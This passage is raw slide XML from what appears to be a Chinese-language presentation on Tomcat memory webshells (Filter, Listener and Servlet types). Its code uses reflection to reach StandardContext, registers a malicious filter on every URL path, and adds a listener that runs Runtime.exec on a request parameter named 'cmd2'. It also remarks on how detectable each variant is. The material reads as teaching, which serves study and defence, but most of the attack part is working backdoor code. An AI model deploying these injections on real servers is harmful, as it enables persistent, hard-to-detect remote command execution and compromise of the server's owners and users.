              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>JSP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>中写入恶意类来实现此目的。整体思路是首先要获得一个干活的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>context</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>也就是StandardContext并且要通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>StandardContext中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>filterConfigs属性来动态注册</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Filter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>部分代码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>如下：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>//定义过滤器</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>final String name = "FilterMemShell"; </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1"/>
              <a:t>//获取servletContext</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>ServletContext servletContext = request.getSession().getServletContext();</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>Field appctx = servletContext.getClass().getDeclaredField("context");</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>appctx.setAccessible(true);</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1"/>
              <a:t>//获取ApplicationContext</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>ApplicationContext applicationContext = (ApplicationContext) appctx.get(servletContext);</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>Field stdctx = applicationContext.getClass().getDeclaredField("context");</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>stdctx.setAccessible(true);</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1"/>
              <a:t>//获取StandardContext</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>StandardContext standardContext = (StandardContext) stdctx.get(applicationContext);</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1"/>
              <a:t>//获取 filterConfigs:存储当前上下文中注册的过滤器配置</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>Field Configs = standardContext.getClass().getDeclaredField("filterConfigs");</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>Configs.setAccessible(true);</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>Map filterConfigs = (Map) Configs.get(standardContext);</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>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565890" cy="5100955"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>if (filterConfigs.get(name) == null) {</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1"/>
              <a:t>//创建过滤器实例:在doFilter方法中实现恶意类。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>Filter filter = new Filter() </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1"/>
              <a:t>//配置过滤器:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>FilterDef filterDef = new FilterDef();</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>filterDef.setFilter(filter);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>filterDef.setFilterName(name);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>filterDef.setFilterClass(filter.getClass().getName());</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>standardContext.addFilterDef(filterDef);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1"/>
              <a:t>//添加过滤器映射:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>FilterMap filterMap = new FilterMap();</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>filterMap.addURLPattern("/*");</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>filterMap.setFilterName(name);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>filterMap.setDispatcher(DispatcherType.REQUEST.name());</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>standardContext.addFilterMapBefore(filterMap);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1"/>
              <a:t>//创建过滤器配置:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>Constructor constructor = ApplicationFilterConfig.class.getDeclaredConstructor(Context.class, FilterDef.class);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>constructor.setAccessible(true);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>ApplicationFilterConfig filterConfig = (ApplicationFilterConfig) constructor.newInstance(standardContext, filterDef);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1"/>
              <a:t>//将过滤器配置放入 filterConfigs 中:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>filterConfigs.put(name, filterConfig);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600"/>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4986020" cy="5100955"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
              <a:t>//配置过滤器:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>FilterDef filterDef = new FilterDef();</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>filterDef.setFilter(filter);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>filterDef.setFilterName(name);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>filterDef.setFilterClass(filter.getClass().getName());</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>standardContext.addFilterDef(filterDef);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
              <a:t>//相当于在web.xml中做了如下配置</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>&lt;filter&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>    &lt;filter-name&gt;FilterMemShell&lt;/filter-name&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>    &lt;filter-class&gt;com.xxx.xxxFilterClass&lt;/filter-class&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>&lt;/filter&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5140325" y="1214755"/>
            <a:ext cx="6201410" cy="5416550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>//添加过滤器映射:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>FilterMap filterMap = new FilterMap();</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>filterMap.addURLPattern("/*");</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>filterMap.setFilterName(name);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>filterMap.setDispatcher(DispatcherType.REQUEST.name());</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>standardContext.addFilterMapBefore(filterMap);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>//相当于在web.xml中做了如下配置</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>&lt;filter-mapping&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    &lt;filter-name&gt;FilterMemShell&lt;/filter-name&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    &lt;url-pattern&gt;/*&lt;/url-pattern&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    &lt;dispatcher&gt;REQUEST&lt;/dispatcher&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>&lt;/filter-mapping&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>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en-US" altLang="zh-CN" b="1"/>
              <a:t>Listener</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>马：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>原理和刚才讲的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Filter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>马是一样的，都是需要先得到StandardContext类，然后在通过addApplicationEventListener方法将定义好的带有恶意代码的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>listener</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>类进行添加。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>代码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>如下：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>定义监听器：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>class S implements ServletRequestListener{</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>    @Override</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>    public void requestDestroyed(ServletRequestEvent servletRequestEvent) {</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>        </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>    }</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>    @Override</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>    public void </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
              <a:t>requestInitialized</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>(ServletRequestEvent servletRequestEvent) {</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>        if(request.getParameter("cmd2") != null){</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>            try {</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>                Runtime.getRuntime().exec(request.getParameter("cmd2"));</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>            } catch (IOException e) {}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>        }</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>    }</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>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6157595" cy="5100955"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ServletContext servletContext =  request.getSession().getServletContext();</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Field appctx = servletContext.getClass().getDeclaredField("context");</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>appctx.setAccessible(true);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ApplicationContext applicationContext = (ApplicationContext) appctx.get(servletContext);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Field stdctx = applicationContext.getClass().getDeclaredField("context");</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>stdctx.setAccessible(true);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>StandardContext standardContext = (StandardContext) stdctx.get(applicationContext);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>S servletRequestListener = new S();</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>standardContext.addApplicationEventListener(servletRequestListener);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6486525" y="1553845"/>
            <a:ext cx="4885690" cy="37503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212725" y="1176020"/>
            <a:ext cx="11710035" cy="5212715"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
              <a:t>Servlet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>马</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>：原理和前面讲的差不多，首先需要对一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>java</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>类实现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Servlet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>接口，并在service方法中编写恶意类，然后拿到StandardContext，然后最后利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Wrapper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>设置路径并绑定对应的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>servlet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>。但是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Servlet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>马有个缺点就是需要访问对应的路径才能执行命令！这样容易被</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>发现。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>部分代码：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>    //获取standardContext</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
